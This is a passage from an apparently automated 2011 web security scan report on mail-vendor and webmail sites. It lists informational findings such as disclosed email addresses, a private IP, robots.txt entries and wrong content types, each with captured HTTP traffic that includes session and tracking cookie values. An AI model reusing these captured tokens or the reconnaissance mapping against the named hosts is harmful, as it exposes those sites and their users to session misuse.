c!--n--\\x3e\\x3c!--m--\\x3e\\x3cli class\\x3dg\\x3e\\x3cdiv class\\x3dvsc sig\\x3dlNL\\x3e\\x3cspan class\\x3dtl\\x3e\\x3ch3 class\\x3d\\x22r\\x22\\x3e\\x3ca href\\x3d\\x22http://www.mail-archive.com/abapclub@googlegroups.com/msg10487.html\\x22 class\\x3dl onmousedown\\x3d\\x22return rwt(this,\\x27\\x27,\\x27\\x27,\\x27\\x27,\\x2710\\x27,\\x27AFQjCNEAvQRIiqG4SOBRR4nk4B3y5uMVNA\\x27,\\x27\\x27,\\x270CGQQFjAJ\\x27)\\x22\\x3e
...[SNIP]...

12.12. http://www.mailsite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=OBGBGCODHNJGPCDNLDDEOMFA

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:31 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...
<script>showChatButton('mailsite@workgroup.rockliffe.com');</script>
...[SNIP]...

12.13. http://www.mailsite.com/nav_functions.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /nav_functions.js

Issue detail

The following email address was disclosed in the response:

Request

GET /nav_functions.js HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://www.mailsite.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=OBGBGCODHNJGPCDNLDDEOMFA

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 17 Mar 2010 20:08:08 GMT
Accept-Ranges: bytes
ETag: "044a08fdc6ca1:4eef"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:59:34 GMT
Content-Length: 33359

/***********************************************************************************
*    (c) Ger Versluis 2000 version 5.411 24 December 2001 (updated Jan 31st, 2003 by Dynamic Drive for Opera7)
*    For info write to menus@burmees.nl         *
*    You may remove all comments for faster loading     *        
***********************************************************************************/

   var NoOffFirstLineMenus=9;            // N
...[SNIP]...
, 2003 by Dynamic Drive for Opera7)
   Updated 19 July, 2003 by GV for CSS CompatMode    
   HV Menu found on Dynamic Drive ONLY may be used on both commercial and non commerical sites    
   For info write to menus@burmees.nl                            
   This script featured on Dynamic Drive DHTML code library: http://www.dynamicdrive.com
*************************************************************************************/
   var Agn
...[SNIP]...

13. Private IP addresses disclosed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /sdch/vD843DpA.dct

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Issue background

RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organisation, the private addresses used internally cannot usually be determined in the same ways.

Discovering the private addresses used within an organisation can help an attacker in carrying out network-layer attacks aiming to penetrate the organisation's internal infrastructure.

Issue remediation

There is not usually any good reason to disclose the internal IP addresses used within an organisation's infrastructure. If these are being returned in service banners or debug messages, then the relevant services should be configured to mask the private addresses. If they are being used to track back-end servers for load balancing purposes, then the addresses should be rewritten with innocuous identifiers from which an attacker cannot infer any useful information about the infrastructure.

Request

GET /sdch/vD843DpA.dct HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=b4ccbc578566f743:FF=0:TM=1305295666:LM=1305298565:S=ky1WAdlUDHsxJ4Yj; NID=46=SIxFXl-Do7C54Kob7mNzCSIXn4Q-82nQ7PL6feAzWGgBE1y2vorG4BcMyEbm1l34C9wpWmxmuxEecah4Q1rQWZcSVEySpmZMoG3SEfPjUnvrSdMVzPE3gQcbLz7UqJyz
If-Modified-Since: Sat, 14 May 2011 11:05:00 GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-sdch-dictionary
Last-Modified: Sun, 15 May 2011 03:44:29 GMT
Date: Sun, 15 May 2011 12:47:44 GMT
Expires: Sun, 15 May 2011 12:47:44 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 116591

Domain: .google.com
Path: /search

<!doctype html> <head> <title>re - Google Search</title> <script>window.google={kEI:"28555,29481,2966,29876,29881,29891,30035,30039,30058",kCSI:{e:"25907,4,29
...[SNIP]...
<a href="/search?hl=en&amp;q=related: http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCN clk(this.href,'','','','1','','0CCk ')">
...[SNIP]...
<b>www.ahttp://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCN clk(this.href,'','','',' UBEBYwBg')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:www.edmunds.com/used-cars/+used+carNKvLeHS7sb0J:www.carsdirect.com/used_cars/search+used+car&hl=en&ct=clnk&gl=us&source=www.google.com','','','',' ')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: rectv.com/DTVAPP/content/contact_us+directKvzX53GQf98J:www.directv.com/DTVAPP/content/My_Account+direct 4','AFQjCN clk(this.href,'','','','4',''
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: OJ7l3PBi2ywJ:www.usedcars.com/+used+carH75rMPosXksJ:www.cars.com/+used+cary4a-lQGHU2cJ:www.vehix.com/+used+car topics.nytimes.com/top/news/business/ &amp;rct=j&amp;sa=
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:4AUACFJFdYwJ:search.aol.com/+aol3-ZEIkE37Z4J:www.directv.com/+direct1nPyaj3yx18J:www.orbitz.com/App/DisplayCarSearch+ &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google
...[SNIP]...
<a href="/search?hl=en&amp;q=related:http://172.31.196.197:8888/search?q=cache: &amp;cd= &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNGclk(this.href,'','','','1','','0C QIDAG')">
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache:_AF_a1pfx4YJ:www.craigslist.com/+o&amp;cd=8&amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' clk(this.href,'','','','8',
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','',' 9','AFQjCNFclk(this.href,'','','','9','','0C en.wikipedia.org
...[SNIP]...
<a href="http://172.31.196.197:8888/search?q=cache: &amp;hl=en&amp;ct=clnk&amp;gl=us&amp;source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNFclk(this.href,'','','','1rwt(this,'','','','1 cl
...[SNIP]...

14. Robots.txt file  previous  next
There are 5 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


14.1. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3587
Expires: Sun, 15 May 2011 13:48:16 GMT
Date: Sun, 15 May 2011 12:48:29 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...

14.2. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=83173134
Expires: Thu, 02 Jan 2014 04:27:21 GMT
Date: Sun, 15 May 2011 12:48:27 GMT
Connection: close

User-agent: *
Disallow: /

14.3. http://rockliffe.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: rockliffe.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Mon, 02 Jun 2008 20:44:10 GMT
Accept-Ranges: bytes
ETag: "0898868f1c4c81:4eef"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:58:23 GMT
Connection: close

User-Agent: *
Disallow:

14.4. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 15 May 2011 12:58:30 GMT
Expires: Sun, 15 May 2011 12:58:30 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

14.5. http://www.mailsite.com/common/reporterror.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mailsite.com

Response

HTTP/1.1 200 OK
Content-Length: 24
Content-Type: text/plain
Last-Modified: Mon, 02 Jun 2008 20:44:10 GMT
Accept-Ranges: bytes
ETag: "0898868f1c4c81:4eef"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:59:11 GMT
Connection: close

User-Agent: *
Disallow:

15. Cacheable HTTPS response  previous  next
There are 2 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


15.1. https://totalcontrol.hotchilli.net/CFIDE/scripts/cfform.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /CFIDE/scripts/cfform.js

Request

GET /CFIDE/scripts/cfform.js HTTP/1.1
Host: totalcontrol.hotchilli.net
Connection: keep-alive
Referer: https://totalcontrol.hotchilli.net/index.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=3833927; CFTOKEN=72817657

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:17 GMT
Server: Apache/2.0.61 (Unix)
Last-Modified: Wed, 11 Jul 2007 17:30:46 GMT
ETag: "b87e0-2979-435003cf7fd80"
Accept-Ranges: bytes
Content-Length: 10617
Connection: close
Content-Type: text/x-js

/*ADOBE SYSTEMS INCORPORATED
Copyright 2007 Adobe Systems Incorporated
All Rights Reserved.

NOTICE: Adobe permits you to use, modify, and distribute this file in accordance with the
terms of the Ado
...[SNIP]...

15.2. https://totalcontrol.hotchilli.net/CFIDE/scripts/masks.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://totalcontrol.hotchilli.net
Path:   /CFIDE/scripts/masks.js

Request

GET /CFIDE/scripts/masks.js HTTP/1.1
Host: totalcontrol.hotchilli.net
Connection: keep-alive
Referer: https://totalcontrol.hotchilli.net/index.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=3833927; CFTOKEN=72817657

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:05:18 GMT
Server: Apache/2.0.61 (Unix)
Last-Modified: Wed, 11 Jul 2007 17:30:46 GMT
ETag: "b87f5-f39-435003cf7fd80"
Accept-Ranges: bytes
Content-Length: 3897
Connection: close
Content-Type: text/x-js

/*ADOBE SYSTEMS INCORPORATED
Copyright 2007 Adobe Systems Incorporated
All Rights Reserved.

NOTICE: Adobe permits you to use, modify, and distribute this file in accordance with the
terms of the Ado
...[SNIP]...

16. HTML does not specify charset  previous  next
There are 7 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


16.1. http://rockliffe.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /

Request

GET / HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:58:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=DOFBGCODDHACNBJDFNFHDMLA; path=/
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...

16.2. http://rockliffe.com/portal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rockliffe.com
Path:   /portal/

Request

GET /portal/ HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG; __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmb=179611303; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:04 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 10544


<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
       <SCRIPT LANGUAGE="JavaScript">
       function popUp(URL) {
           da
...[SNIP]...

16.3. http://webchat.rockliffe.com:9090/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webchat.rockliffe.com:9090
Path:   /

Request

GET / HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=179611303.870644604.1305464308.1305464308.1305464308.1; __utmc=179611303; __utmz=179611303.1305464308.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=179611303; JSESSIONID=ue7tob0dpobg

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Thu, 12 Aug 2010 10:56:58 GMT
Accept-Ranges: bytes
Content-Length: 129

<html>
<head><title></title>
<meta http-equiv="refresh" content="0;URL=http://www.mailsite.com">
</head>
<body>
</body>
</html>


16.4. http://webmail.hotchilli.co.uk/stylecfg.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webmail.hotchilli.co.uk
Path:   /stylecfg.asp

Request

GET /stylecfg.asp HTTP/1.1
Host: webmail.hotchilli.co.uk
Proxy-Connection: keep-alive
Referer: http://webmail.hotchilli.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBQACBB=OCBANHLDDLCELCHIFEOCPNOD

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:47:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1364
Content-Type: text/html
Cache-control: private

<!-- Copyright 1999-2004 Rockliffe Systems, Inc. -->
<!-- stylecfg.asp ver. 5.3.11 -->

<!--

a.sidemenu:link, a.sidemenu:visited, a.sidemenu:active {text-decoration: none; color: #FFFFFF;}
a.si
...[SNIP]...

16.5. http://www.mailsite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /

Request

GET / HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=OBGBGCODHNJGPCDNLDDEOMFA

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:31 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 52418

<HTML>
<HEAD>
<SCRIPT LANGUAGE="JavaScript" SRC="/nav_gui.js"></SCRIPT>
<SCRIPT LANGUAGE="JavaScript" SRC="/tabs.js"></SCRIPT>
<script>

function showflash(){

//    var browser = BrowserDetect.b
...[SNIP]...

16.6. http://www.mailsite.com/common/reporterror.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /common/reporterror.asp

Request

GET /common/reporterror.asp?webpage=UserRoomAccessIssue HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/portal/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 15 May 2011 12:59:11 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQQDRABTC=PBGBGCODMNOOCPBDMDNPCLOJ; path=/
Vary: Accept-Encoding
Content-Length: 1744


<HTML>
<HEAD>
<META name='description' content='Email Server and Calendar Server software for businesses, enterprises, and service providers with webmail, calendar, contact and ActiveSync serv
...[SNIP]...

16.7. http://www.mailsite.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mailsite.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.mailsite.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=OBGBGCODHNJGPCDNLDDEOMFA

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:59:11 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

17. Content type incorrectly stated  previous  next
There are 9 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


17.1. http://rockliffe.com/quicklinks.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://rockliffe.com
Path:   /quicklinks.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /quicklinks.js HTTP/1.1
Host: rockliffe.com
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQDRABTC=COFBGCODFJKBCOFEBJOEEEJG

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 04 Nov 2010 09:03:11 GMT
Accept-Ranges: bytes
ETag: "8031ff1aff7bcb1:4eef"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 12:58:27 GMT
Content-Length: 892

Menu9=new Array("<table cellpadding='0' cellspacing='0' border='0' width='100%' height='100%'><tr><td width='70px'><div style='color: white; font-family: verdana,arial; font-weight: normal; font-style
...[SNIP]...

17.2. http://webchat.rockliffe.com:9090/webchat/common.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://webchat.rockliffe.com:9090
Path:   /webchat/common.js

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /webchat/common.js HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 9017
Last-Modified: Wed, 13 Oct 2010 12:21:39 GMT

/*
* $RCSfile$
* $Revision: 19342 $
* $Date: 2005-07-20 09:30:31 -0700 (Wed, 20 Jul 2005) $
*
* Copyright (C) 2003-2008 Jive Software. All rights reserved.
*
* This software is the propr
...[SNIP]...

17.3. http://webchat.rockliffe.com:9090/webchat/live  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://webchat.rockliffe.com:9090
Path:   /webchat/live

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /webchat/live?action=isAvailable&workgroup=mailsite@workgroup.rockliffe.com HTTP/1.1
Host: webchat.rockliffe.com:9090
Proxy-Connection: keep-alive
Referer: http://rockliffe.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg; charset=UTF-8
Content-Length: 1405

GIF89as....?....u.................O.....p.......................?}..................................r..............l.........................._...........}...........6v.{........x..{..u...........6w..
...[SNIP]...

17.4. http://webmail.hotchilli.co.uk/stylecfg.asp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://webmail.hotchilli.co.uk
Path:   /stylecfg.asp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /stylecfg.asp HTTP/1.1
Host: webmail.hotchilli.co.uk
Proxy-Connection: keep-alive
Referer: http://webmail.hotchilli.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCBQACBB=OCBANHLDDLCELCHIFEOCPNOD

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 12:47:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1364
